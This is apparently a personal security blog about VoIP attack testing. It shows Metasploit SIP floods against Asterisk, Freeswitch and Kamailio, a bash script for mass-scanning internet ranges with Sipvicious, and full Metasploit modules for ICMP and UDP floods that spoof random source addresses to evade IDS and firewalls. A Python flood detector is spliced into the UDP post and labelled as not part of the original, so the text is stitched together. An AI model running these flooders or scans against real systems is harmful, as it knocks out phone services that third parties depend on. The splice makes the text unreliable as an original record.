<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7MzRPCOEFG8h5-I4O1YUrNcsFv9YMGH5IxUkfVWHiZm4S8nborwg-nPVSuFpC3CJvmdH4HNY-GVdGP0MXKElvoNH_gM7MePVlFHls9_QRRXIbW0fPooNYJDtAVveKrb7DDXHFb88664/s1600/Captura+de+pantalla+de+2012-05-01+17%253A29%253A05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7MzRPCOEFG8h5-I4O1YUrNcsFv9YMGH5IxUkfVWHiZm4S8nborwg-nPVSuFpC3CJvmdH4HNY-GVdGP0MXKElvoNH_gM7MePVlFHls9_QRRXIbW0fPooNYJDtAVveKrb7DDXHFb88664/s400/Captura+de+pantalla+de+2012-05-01+17%253A29%253A05.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFXPqrgmfY0WN6USQmsPyX6ni66rirGV2g7rhf0-XKnEFfU0CQKaUnt2PKqqBwoenOUQR28UU5NH0m05vASjfXbMwDqSvon62jhV8C0vOh5yYTxyhDU6uUY-vXTjROK9tMvByLLuoXISc/s1600/Captura+de+pantalla+de+2012-05-01+17%253A29%253A13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFXPqrgmfY0WN6USQmsPyX6ni66rirGV2g7rhf0-XKnEFfU0CQKaUnt2PKqqBwoenOUQR28UU5NH0m05vASjfXbMwDqSvon62jhV8C0vOh5yYTxyhDU6uUY-vXTjROK9tMvByLLuoXISc/s400/Captura+de+pantalla+de+2012-05-01+17%253A29%253A13.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6rVx0zpFMl3m7dplrBWVpTQzT_VwPFE9Q6ZfLbYFL2Bzme4VtY9poDmgH8rIop9kDm7xkVrXmSwcuDyYjCOaoPdmCSzqElofrQ0mLMAZ_161riydadB2yDrfPOmITosRdzSUfTYvd7oA/s1600/Captura+de+pantalla+de+2012-05-01+17:29:22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6rVx0zpFMl3m7dplrBWVpTQzT_VwPFE9Q6ZfLbYFL2Bzme4VtY9poDmgH8rIop9kDm7xkVrXmSwcuDyYjCOaoPdmCSzqElofrQ0mLMAZ_161riydadB2yDrfPOmITosRdzSUfTYvd7oA/s400/Captura+de+pantalla+de+2012-05-01+17:29:22.png" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidxBqVkKeXAdpSWbnKp0GisDJIIOhgrBYfvkBJWbK1y3JpIMzqlwo8NbWee3GUdqIws3BXlGvgqDikwauvQyWg9gAZ3eQhqZyWgGumZ4rUaROxOizK-a93t892fKMUaN-zmIjNJjuuY4s/s1600/Captura+de+pantalla+de+2012-05-01+17:30:17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidxBqVkKeXAdpSWbnKp0GisDJIIOhgrBYfvkBJWbK1y3JpIMzqlwo8NbWee3GUdqIws3BXlGvgqDikwauvQyWg9gAZ3eQhqZyWgGumZ4rUaROxOizK-a93t892fKMUaN-zmIjNJjuuY4s/s400/Captura+de+pantalla+de+2012-05-01+17:30:17.png" width="400" /></span></a><br />
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCKWcYOeHZNHXB7QjeSIN5FShycszQAX1rrKzmqd5M_k77rSPBao4kT5LQjH6IQWs-bkMcxpoJS1lWrdNlJGE-ub93Gos2KMeNRO1RkkaAVtKjuMo2k4CwPiG8mtoLvZvrc1SmeuM74Cc/s1600/Captura+de+pantalla+de+2012-05-01+17:51:30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCKWcYOeHZNHXB7QjeSIN5FShycszQAX1rrKzmqd5M_k77rSPBao4kT5LQjH6IQWs-bkMcxpoJS1lWrdNlJGE-ub93Gos2KMeNRO1RkkaAVtKjuMo2k4CwPiG8mtoLvZvrc1SmeuM74Cc/s400/Captura+de+pantalla+de+2012-05-01+17:51:30.png" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Metasploit vs. Freeswitch</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTzV5p10v-CZZXdQbgZQdjoVkpA4Tawj1ZPGbqX8bfEk8vK7Ehz_ieFFI7dXM7-LUcZftuWsLN8_gYAU9NP_aSxXKUcri9_peNBFS05RmSAWs8QYweHRjYktHQwcv0nK0qnHCqbUVHl60/s1600/Captura+de+pantalla+de+2012-05-01+18:14:19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTzV5p10v-CZZXdQbgZQdjoVkpA4Tawj1ZPGbqX8bfEk8vK7Ehz_ieFFI7dXM7-LUcZftuWsLN8_gYAU9NP_aSxXKUcri9_peNBFS05RmSAWs8QYweHRjYktHQwcv0nK0qnHCqbUVHl60/s400/Captura+de+pantalla+de+2012-05-01+18:14:19.png" width="400" /></a></span><span style="font-family: 'Trebuchet MS', sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPRiAu0p8htfb9dhhkFF4K3jfL1aveGEu6LE5bOezfAAMsY9huzhgr0gkRdoG2NzkAHumpQqFSvE38olWAtf-WOE52pEmZU5-_pgs86KRJpl1X6mINO_ymGtZJiJiCkGFlFe0Cpd5LUbs/s1600/Captura+de+pantalla+de+2012-05-01+18:16:23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPRiAu0p8htfb9dhhkFF4K3jfL1aveGEu6LE5bOezfAAMsY9huzhgr0gkRdoG2NzkAHumpQqFSvE38olWAtf-WOE52pEmZU5-_pgs86KRJpl1X6mINO_ymGtZJiJiCkGFlFe0Cpd5LUbs/s400/Captura+de+pantalla+de+2012-05-01+18:16:23.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"></span></div>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9h2JbDaqjJUo45SkOBnCqp52niy5rGJ5waRvlz9P5cLwschexlEWtrJHdkrsEibGTKmmG1EDUxXL1SYjnKdUBadRIQIfm80IQbAStZgZ-cq1fNJ2eaO_dIFpONkkhoCbvgdrdpXCj10/s1600/Captura+de+pantalla+de+2012-05-01+18:16:14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9h2JbDaqjJUo45SkOBnCqp52niy5rGJ5waRvlz9P5cLwschexlEWtrJHdkrsEibGTKmmG1EDUxXL1SYjnKdUBadRIQIfm80IQbAStZgZ-cq1fNJ2eaO_dIFpONkkhoCbvgdrdpXCj10/s400/Captura+de+pantalla+de+2012-05-01+18:16:14.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6uDeuzXhorZN5wm9RpgmHKE-b1Z5oH_7Nkviayach7P38feOWhssk7ere_NDlKKdyZ2uq-qK6q7rp83zY8TXj5MJ91nrj2dN7zJRt-CNNl1BgOBK2q1jVwLAKaPHSUUBlPCGUn4z3hY/s1600/Captura+de+pantalla+de+2012-05-01+18:16:46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6uDeuzXhorZN5wm9RpgmHKE-b1Z5oH_7Nkviayach7P38feOWhssk7ere_NDlKKdyZ2uq-qK6q7rp83zY8TXj5MJ91nrj2dN7zJRt-CNNl1BgOBK2q1jVwLAKaPHSUUBlPCGUn4z3hY/s400/Captura+de+pantalla+de+2012-05-01+18:16:46.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0nLX0LHZOH0dN6CvcPEmNoOMaN5aEa4lsX15cR2ajikjNJhO_9Apb3TH30EGHcRHWqeVHI54jSTdEUdv4VdT8aEM_arvoo8Mfl1u_NTE4JjyqBpzNFHI3JkfkcqUCsjP4KWupfE6BSc/s1600/Captura+de+pantalla+de+2012-05-01+18:18:21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0nLX0LHZOH0dN6CvcPEmNoOMaN5aEa4lsX15cR2ajikjNJhO_9Apb3TH30EGHcRHWqeVHI54jSTdEUdv4VdT8aEM_arvoo8Mfl1u_NTE4JjyqBpzNFHI3JkfkcqUCsjP4KWupfE6BSc/s400/Captura+de+pantalla+de+2012-05-01+18:18:21.png" width="400" /></a></span></div>
</div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Metasploit vs. Kamailio</span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif;"><br /></span>
<div style="text-align: left;">
<span style="font-family: 'Trebuchet MS', sans-serif;">The pictures show how the Metasploit module can flood both Asterisk and Freeswitch, but not Kamailio. Moreover, Asterisk lost REGISTER packets under the attack and Freeswitch did "strange" things, answering with a lot of "200 OK" responses. This problem would be much more important in a real environment with hundreds of phones trying to register at the same time.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;"><br /></span>
<span style="font-family: 'Trebuchet MS', sans-serif;">In conclusion, we can confirm the use of Kamailio (I think OpenSIPS or another SIP proxy would give the same results) as the frontier with "the wild". In addition, we can also use the Pike module for DoS protection, and we could suppose that it would handle a high volume of traffic better than the other two alternatives. To sum up, I would like to remark that Kamailio creates different forks to manage connections, which seems to be the key to its good performance. Next time I will show how to flood Kamailio with better results and the countermeasures to protect yourself against it. ;)</span></div>
</div>
<b>Scanning the world with Sipvicious</b> (2012-02-11)<br />
Hi, I'm scanning a large number of ranges with <a href="http://code.google.com/p/sipvicious/" target="_blank">Sipvicious</a> ("<a href="http://code.google.com/p/sipvicious/wiki/SvmapUsage">svmap.py</a>") and I would like to share some tips which helped me during the process:<br />
<br />
- The use of sessions (-s) and reports ("svreport.py") is necessary to prevent mixing up the obtained data.<br />
<br />
- It's a good idea to scan not only port 5060; you should add the following ports too, because some sysadmins configure their SIP services to run there (-p5060-5065).<br />
<br />
- There is a <a href="http://www.voip-info.org/wiki/view/NAT+and+VOIP">well known "problem"</a> with SIP and NAT; if you have installed an Asterisk you have surely heard about it :(, so we need to specify our external IP address to Sipvicious with the (-x) parameter. Moreover, port 5060 (Sipvicious' outgoing port) has to be forwarded to the host which is scanning, and in case you are scanning with more than one instance at the same time, the following ports should be forwarded too. I usually put the host in the DMZ to avoid these problems.<br />
<br />
- "svreport.py" tries to make a DNS lookup for the discovered IPs, but it takes too much time with too many hosts, so we can disable it (-n).<br />
<br />
- Normally, some hosts aren't recognized and are marked as "unknown"; you could run tcpdump in order to capture the responses and avoid the loss of information.<br />
<br />
- I wrote this dirty bash script, which reflects the ideas above:<br />
<br />
Code:<br />
<pre><code>#!/bin/bash
# Scans the ranges listed in a text file (one CIDR range per line) with SIPVicious
# Use: ./scanRange.sh

SVMAP="/home/baguira/Installed/sipvicious/svmap.py"
SVREPORT="/home/baguira/Installed/sipvicious/svreport.py"

# just in case of "unknown" devices: capture every UDP reply to the scanning host
# (tcpdump options must come before the filter expression)
sudo tcpdump -s 65535 -w capture1.pcap udp and dst host 192.168.9.5 &

# scan all ranges
for RANGE in $(cat ranges1.txt)
do
    # session name: the network part of the CIDR range
    RNAME=$(echo "$RANGE" | awk -F / '{print $1}')
    EXTIP=$(curl -s icanhazip.com)
    "$SVMAP" -p5060-5065 -s "$RNAME" -x "$EXTIP" --randomize "$RANGE"
    NEXTIP=$(curl -s icanhazip.com)
    # external ip change check
    if [ "$EXTIP" != "$NEXTIP" ]
    then
        # wait until the router finishes rebooting, then drop the session and rescan
        sleep 180
        "$SVREPORT" delete -s "$RNAME"
        EXTIP=$(curl -s icanhazip.com)
        "$SVMAP" -p5060-5065 -s "$RNAME" -x "$EXTIP" --randomize "$RANGE"
    fi
    # export the session report, without DNS lookups (-n)
    "$SVREPORT" export -s "$RNAME" -f txt -o "$RNAME.txt" -n
done
sudo killall tcpdump > /dev/null
</code></pre>
<br />
To sum up, I would like to thank <a href="http://twitter.com/sandrogauci">Sandro Gauci</a> (Sipvicious developer) for the software and for being really nice with my doubts. Thank you man! ;)<br />
<br /><b>Another simple Metasploit module: ICMP Flooder</b> (2012-01-15)<br />
Hi again! I said I was going to develop VoIP-related Metasploit modules, but I was reading the <a href="http://www.planb-security.net/packetfu/doc/classes/PacketFu/ICMPPacket.html">PacketFu documentation</a> and found that writing an <a href="http://en.wikipedia.org/wiki/Denial-of-service_attack#ICMP_flood">ICMP flooder</a> couldn't be too complicated at this point. So I share this code too; I decided to include the SHOST and SIZE options as well, trying to get a more flexible module able to produce different flavors of this attack such as <a href="http://en.wikipedia.org/wiki/Ping_flood">Ping flood</a>, <a href="http://en.wikipedia.org/wiki/Smurf_attack">Smurf</a> or <a href="http://en.wikipedia.org/wiki/Ping_of_death">Ping of death</a>. The next pictures show the module in the same way as the last post.<br />
<br />
Code:<br />
<br />
<pre><code>require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'ICMP Flooder',
      'Description' => 'A simple ICMP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )

    register_options(
      [
        OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
        OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),
        OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])
      ], self.class)
    # Capture options that make no sense for a module that only sends
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
  end

  # Source address: SHOST if set, otherwise a random IPv4 address per packet
  def srchost
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
  end

  # Payload size in bytes (default 256)
  def size
    datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
  end

  def run
    open_pcap

    sent = 0
    num  = datastore['NUM'].to_i   # unset or 0 means unlimited

    print_status("ICMP flooding #{rhost}...")

    p = PacketFu::ICMPPacket.new
    p.icmp_type = 8                # Echo Request
    p.icmp_code = 0
    p.ip_daddr  = rhost

    while (num <= 0) or (sent < num)
      p.ip_saddr = srchost
      p.payload  = rand(36**size).to_s(36)   # random alphanumeric filler (up to SIZE chars)
      p.recalc
      capture_sendto(p, rhost)
      sent += 1
    end

    close_pcap
  end
end
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcz9wMiNBEH5Rsewgja8xulDafcru59EYO1DU2rnt5fQOMvS77A08p197OQDjTLhEt0S7xOvCUf4kD8WD64TByoOJM0GDqcHPfwwAanrpUF0KEbRrDkcekawyfwP2ygs1SndPJ-g-Rqe8/s1600/figure1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcz9wMiNBEH5Rsewgja8xulDafcru59EYO1DU2rnt5fQOMvS77A08p197OQDjTLhEt0S7xOvCUf4kD8WD64TByoOJM0GDqcHPfwwAanrpUF0KEbRrDkcekawyfwP2ygs1SndPJ-g-Rqe8/s320/figure1.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;">Figure: Usage information</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcEpPBMFyUMa4oK2ohpNYpzQog91J7xnEkdWXYnUL0MGHH4B5QXNFhAuq-A1W7dqboZL4v95fmreM6f7oIJHRvrlRyNgFKArF3jfzyaEji5ZpqrCKdfTUqEwohcLAiFXVVfONqjk8pS6k/s1600/figure2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcEpPBMFyUMa4oK2ohpNYpzQog91J7xnEkdWXYnUL0MGHH4B5QXNFhAuq-A1W7dqboZL4v95fmreM6f7oIJHRvrlRyNgFKArF3jfzyaEji5ZpqrCKdfTUqEwohcLAiFXVVfONqjk8pS6k/s320/figure2.png" width="320" /></a></div>
<div style="text-align: -webkit-auto;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-small;">Figure: Sniffed packets</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: right;">
Jesús Pérez</div><b>My first Metasploit module: UDP Flooder</b> (2012-01-15)<div>
There are <a href="http://metasploit.com/modules/framework/search?utf8=%E2%9C%93&osvdb=&bid=&text=sip&cve=&msb=">very few VoIP-related Metasploit modules</a>, neither auxiliaries nor exploits, so I have in mind to write some of them in my free time. Today I want to share a <a href="http://en.wikipedia.org/wiki/UDP_flood_attack">UDP flooder</a> auxiliary module, which is very simple but perfect for learning. <a href="http://www.hackingvoip.com/tools/udpflood.tar.gz">UDPFlooder</a> is one of the many tools covered in the <a href="http://www.hackingvoip.com/">"Hacking VoIP Exposed"</a> book, considered a reference in this field.<br />
<br />
Code:<br />
<br />
<pre><code>require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'UDP Flooder',
      'Description' => 'A simple UDP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )

    register_options(
      [
        Opt::RPORT(5060),
        OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
        OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
        OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),
        OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
      ], self.class)
    # Capture options that make no sense for a module that only sends
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN')
  end

  # Source port: SPORT if set, otherwise a random port per packet
  def sport
    datastore['SPORT'].to_i.zero? ? rand(65535) + 1 : datastore['SPORT'].to_i
  end

  def rport
    datastore['RPORT'].to_i
  end

  # Source address: SHOST if set, otherwise a random IPv4 address per packet
  def srchost
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
  end

  # Payload size in bytes (default 256)
  def size
    datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
  end

  def run
    open_pcap

    sent = 0
    num  = datastore['NUM'].to_i   # unset or 0 means unlimited

    print_status("UDP flooding #{rhost}:#{rport}...")

    p = PacketFu::UDPPacket.new
    p.ip_daddr  = rhost
    p.udp_dport = rport

    while (num <= 0) or (sent < num)
      p.ip_ttl    = rand(128) + 128            # random TTL in 128..255
      p.ip_saddr  = srchost
      p.udp_sport = sport
      p.payload   = rand(36**size).to_s(36)    # random alphanumeric filler (up to SIZE chars)
      p.recalc
      capture_sendto(p, rhost)
      sent += 1
    end

    close_pcap
  end
end
</code></pre>
<br />
<br />
Most of the code is taken from the Metasploit <a href="http://metasploit.com/modules/auxiliary/dos/tcp/synflood">TCP SYN Flooder</a> module, but I made some more changes besides adapting it to UDP. In the same way the TTL is changed in each packet, I prefer to change the (spoofed) source address too, for the same reason (IDS/firewall evasion). Moreover, in this case something to send is needed, so I added the new option SIZE, which determines the length of this random string. Another difference you could appreciate is that the option SNAPLEN is unregistered too, because it makes no sense in this module.<br />
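Detection counterpart to the two flooder modules above (the ICMP one from the previous post and this UDP one), as an added example that is not part of the original posts: because every packet carries a fresh spoofed source address, per-source rate limits never trigger, so the detector counts packets per destination and reports the source-address churn and TTL spread as the spoofing signature. The packet records, addresses and thresholds are constructed here; nothing is read from a live interface.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
import random


@dataclass(frozen=True)
class Pkt:
    ts: float      # capture time in seconds
    proto: str     # "udp" or "icmp"
    src: str       # source IPv4 address
    ttl: int       # IP TTL
    dst: str       # destination IPv4 address
    dport: int     # UDP destination port, 0 for ICMP


@dataclass
class Alert:
    key: tuple            # (dst, proto, dport)
    window_start: float
    packets: int          # packets in the window when the alert fired
    distinct_sources: int
    ttl_spread: int       # max(ttl) - min(ttl) inside the window


def detect_floods(packets, window=1.0, rate_threshold=200):
    """Flag each (dst, proto, dport) that receives more than `rate_threshold`
    packets inside any `window` seconds. Counting per destination is what makes
    this work against the modules above: per-source limits never trigger because
    each packet carries a different spoofed source address."""
    alerts = {}
    windows = defaultdict(deque)
    for pkt in sorted(packets, key=lambda p: p.ts):
        key = (pkt.dst, pkt.proto, pkt.dport)
        q = windows[key]
        q.append(pkt)
        while q[0].ts < pkt.ts - window:       # drop packets older than the window
            q.popleft()
        if len(q) > rate_threshold and key not in alerts:
            ttls = [p.ttl for p in q]
            alerts[key] = Alert(key, q[0].ts, len(q),
                                len({p.src for p in q}), max(ttls) - min(ttls))
    return list(alerts.values())


def looks_spoofed(alert, spoof_ratio=0.5):
    """Spoofing signature of the SHOST-less mode: almost every packet in the
    window has a different source (and, for the UDP module, a random TTL)."""
    return alert.distinct_sources / alert.packets >= spoof_ratio


def constructed_traffic(seed=1):
    """Constructed sample (made-up addresses): 50 phones registering normally,
    then a UDP flood on 5060 and an ICMP echo flood against PBX 10.0.0.5."""
    rnd = random.Random(seed)
    pkts = []
    for i in range(50):                                  # legitimate REGISTERs
        pkts.append(Pkt(i * 0.2, "udp", f"10.0.1.{i + 1}", 64, "10.0.0.5", 5060))
    rand_ip = lambda: ".".join(str(rnd.randrange(256)) for _ in range(4))
    for i in range(1000):                                # UDP flooder, 0.5 s burst
        pkts.append(Pkt(5.0 + i * 0.0005, "udp", rand_ip(),
                        rnd.randrange(128, 256), "10.0.0.5", 5060))
    for i in range(500):                                 # ICMP flooder, 0.3 s burst
        pkts.append(Pkt(8.0 + i * 0.0006, "icmp", rand_ip(), 64, "10.0.0.5", 0))
    return pkts


if __name__ == "__main__":
    for a in detect_floods(constructed_traffic()):
        print(a, "spoofed" if looks_spoofed(a) else "single source")
```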
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivmuf0M2kht1U_nkG0EcycynGKWD0NzQuwEM8PCqg8ZSzHX1ZZA_TrM1IQ9HZW11OfB3HZNwAHtkgCGWIs-BavaZntwRYDVQgFVd0aMmBpt9iWiGsizgyV_hsWu0rl3-BVTOC9n7adSx4/s1600/figure1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivmuf0M2kht1U_nkG0EcycynGKWD0NzQuwEM8PCqg8ZSzHX1ZZA_TrM1IQ9HZW11OfB3HZNwAHtkgCGWIs-BavaZntwRYDVQgFVd0aMmBpt9iWiGsizgyV_hsWu0rl3-BVTOC9n7adSx4/s320/figure1.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;">Figure: Usage information</span></div>
<br />
Finally, in order to test whether the module works fine, I'm going to sniff the interface and see, with the help of Wireshark, what is really happening. The next picture shows that everything seems to be working as defined in the description of the attack. :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41l1K3dZrtClX3ExI1W9a9EslUNY3avG12nMyM58TefxetfRWupMni5TzBFKfx4LHL4j8RzfKNDyb-2Sl2ypY8odYeY9sc058qpekhe8bfrKGdWZ0fntBFwCngFUT5NarzBdwSH0jsWk/s1600/figure2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41l1K3dZrtClX3ExI1W9a9EslUNY3avG12nMyM58TefxetfRWupMni5TzBFKfx4LHL4j8RzfKNDyb-2Sl2ypY8odYeY9sc058qpekhe8bfrKGdWZ0fntBFwCngFUT5NarzBdwSH0jsWk/s320/figure2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSKHFHIgAf-oOE6zOE0OAVp7qdmBZQD0ZmeahLJpYY9y0W8Ty27dIyiw3_OS-T7HEVFPSR1EuuP53BKf52QvBhKTEdPJTMHIgpHjEh-re3lptb9V0v-vmbx-W-gvoot66_SoytVXTfjK8/s1600/figure3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSKHFHIgAf-oOE6zOE0OAVp7qdmBZQD0ZmeahLJpYY9y0W8Ty27dIyiw3_OS-T7HEVFPSR1EuuP53BKf52QvBhKTEdPJTMHIgpHjEh-re3lptb9V0v-vmbx-W-gvoot66_SoytVXTfjK8/s320/figure3.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;">Figures: Sniffed packets</span></div>
<br />
<div style="text-align: right;">
Jesús Pérez</div>
</div>
<b>Some posts on Flu-Project blog</b> (2011-11-22)<br />
I recently wrote two posts (in Spanish) on the <a href="http://www.flu-project.com/">Flu-Project</a> blog about my recent experience at <a href="http://www.sindominio.net/hackmeeting/">Hackmeeting 2011 (MeigHacks)</a> and some of the topics I covered during <a href="http://www.sindominio.net/hackmeeting/index.php?title=2011/Nodos/Herramientas_de_%22bot%C3%B3n_gordo%22_y_hacktivismo">my lecture</a>, including <a href="http://w3af.sourceforge.net/">W3af</a> and <a href="http://sqlmap.sourceforge.net/">SQLMap</a>. These are the links:<br />
<br />
- <a href="http://www.flu-project.com/de-paso-por-el-hackmeeting-2o11.html">De paso por el Hackmeeting 2011</a><br />
- <a href="http://www.flu-project.com/badstore-sqli-y-otras-chicas-del-monton.html">Badstore, SQLi y otras chicas del montón</a><br />
<br />
<br />
<div style="text-align: right;">
Jesús Pérez</div><b>VoIP Information Gathering: Metasploit</b> (2011-09-14)<br />
<a href="https://www.owasp.org/index.php/Testing:_Information_Gathering">Information gathering</a> is the stage of a penetration test in which the attacker tries to collect as much information as possible about the target. This step is normally composed of <a href="http://www.sans.org/reading_room/whitepapers/auditing/footprinting-it-it-why_62">footprinting</a> and <a href="http://en.wikipedia.org/wiki/TCP/IP_stack_fingerprinting">fingerprinting</a> but, in the case of VoIP systems, we should add extension enumeration to the list. During this last step the attacker will attempt to obtain valid extensions/users of the target system.<br />
<br />
<br />
<b>Footprinting & Fingerprinting</b><br />
<br />
My favourite tools for these jobs are <a href="http://www.youtube.com/watch?v=VTDvCnYt1_I">FOCA</a> and <a href="http://nmap.org/">Nmap</a>; it's a bit of a strange combination but it fits me :). FOCA automates almost all the "dirty job" and is the best with public document metadata, while Nmap's flexibility lets me confirm manually all the discovered stuff. Moreover, in the case of the SIP protocol, FOCA is also able to obtain more information from the target's <a href="http://www.voip-info.org/wiki/view/DNS+SRV">DNS SRV records</a>, which work during a call in a similar way to <a href="http://en.wikipedia.org/wiki/MX_record">MX</a> records for mail. The next picture, taken from the blog of its <a href="http://www.elladodelmal.com/">"father"</a>, shows an example of them.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
